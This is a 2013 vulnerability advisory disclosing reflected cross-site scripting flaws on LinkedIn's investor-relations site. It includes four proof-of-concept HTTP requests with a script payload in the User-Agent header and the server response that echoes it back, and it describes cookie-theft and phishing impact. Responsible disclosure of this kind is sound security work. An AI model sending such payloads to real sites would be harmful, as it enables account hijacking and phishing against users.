=============================================
INTERNET SECURITY AUDITORS ALERT 2013-006
- Original release date: 4th March 2013
- Last revised:  25th March 2013
- Discovered by: Eduardo Garcia Melia
- Severity: 4.3/10 (CVSS Base Scored)
=============================================

I. VULNERABILITY
-------------------------
Multiple Reflected XSS vulnerabilities in LinkedIn Investors.

II. BACKGROUND
-------------------------
LinkedIn is a social networking service and
website(http://www.linkedin.com/) operates the world's largest
professional network on the Internet with more than 187 million
members in over 200 countries and territories.

More Information: http://press.linkedin.com/about

III. DESCRIPTION
-------------------------
LinkedIn Investors is affected by Multiple reflected Cross-Site
Scripting vulnerabilities. An attacker can inject HTML or script code
in the context of victim's browser, so can perform XSS attacks, and
steal cookies of a targeted user. The affected resource is
http://investors.linkedin.com.

IV. PROOF OF CONCEPT
-------------------------
The XSS vulnerability its in User-Agent:
===============
First XSS
===============
	GET /releasedetail.cfm?ReleaseID=738977' HTTP/1.1
	Host: investors.linkedin.com
	Proxy-Connection: keep-alive
	Cache-Control: max-age=0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	User-Agent: <script>alert("XSS")</script>
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: en-US,en;q=0.8
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
	Content-Length: 2

===============
Second XSS
===============
	GET /eventdetail.cfm?eventid=124442'-- HTTP/1.1
	Host: investors.linkedin.com
	Proxy-Connection: keep-alive
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	User-Agent: <script>alert("XSS")</script>
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: en-US,en;q=0.8
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
	Content-Length: 2
	
===============
Third XSS
===============	
	GET
/stocklookup.cfm?historic_Month=2&historic_Day=4&historic_Year=2013'--
HTTP/1.1
	Host: investors.linkedin.com
	Proxy-Connection: keep-alive
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	User-Agent: <script>alert("XSS")</script>
	Referer: http://investors.linkedin.com/stocklookup.cfm
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: en-US,en;q=0.8
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
	Content-Length: 2
	
===============
Fourth XSS
===============	
	GET
/calculator.cfm?PostBack=1&initialAmnt=100&calc_method=shrs&historic_Month=5&historic_Day=19&historic_Year=2011'--&Submit=Calculate
HTTP/1.1
	Host: investors.linkedin.com
	Proxy-Connection: keep-alive
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	User-Agent: <script>alert("XSS")</script>
	Referer: http://investors.linkedin.com/calculator.cfm
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: en-US,en;q=0.8
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
	Content-Length: 2

RESPONSE in all cases:

	HTTP/1.1 500 Internal Server Error
	Connection: close
	Date: Mon, 04 Mar 2013 11:34:48 GMT
	Server: Microsoft-IIS/6.0
	X-Powered-By: ASP.NET
	server-error: true
	Content-Type: text/html; charset=UTF-8

	<h2>Error occurred processing request</h2>

	<b>Error Diagnostic</b><p>
	<cfoutput>
	Element RESULT.TITLE is undefined in RELEASEDETAIL.  <br>The error
occurred on line 175.

	Date/Time: Mon Mar 04 06:34:48 EST 2013<br>
	Browser: <script>alert("XSS")</script><br>
	Remote Address: 192.168.149.88<br>
	<!--- removed query string from error page - info sec viewed it as
XSS - tws - 05/18/2010 --->
	</cfoutput>

V. BUSINESS IMPACT
------------------------
This flaw can be used by a malicious user to send phishing to the
linked in customers, abusing of the users trust on LinkedIn portal,
tricking the user. This user can be forward to a LinkedIn clone site
to stolen credentials, to some malicious site hosting malware and more.

VI. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the LinkedIn Investors:
http://investors.linkedin.com

VII. SOLUTION
-------------------------
Corrected by vendor.

VIII. REFERENCES
-------------------------
http://investors.linkedin.com
http://www.isecauditors.com
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)

IX. CREDITS
-------------------------
These vulnerabilities have been discovered by
Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March  04, 2013: Initial release
March  10, 2013: Second release

XI. DISCLOSURE TIMELINE
-------------------------
March  04, 2013: Vulnerability acquired by
                 Internet Security Auditors (www.isecauditors.com)
March  10, 2013: Sent to Sec Team.
March  25, 2013: Request for update. Response regarding
                 it was already corrected. Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security, penetration testing, security compliance
implementation and assessing. Our clients include some of the largest
companies in areas such as finance, telecommunications, insurance,
ITC, etc. We are vendor independent provider with a deep expertise
since 2001. Our efforts in R&D include vulnerability research, open
security project collaboration and whitepapers, presentations and
security events participation and promotion. For further information
regarding our security services, contact us.

XIV. FOLLOW US
-------------------------
You can follow Internet Security Auditors, news and security
advisories at:
https://www.facebook.com/ISecAuditors
https://twitter.com/ISecAuditors
http://www.linkedin.com/company/internet-security-auditors
http://www.youtube.com/user/ISecAuditors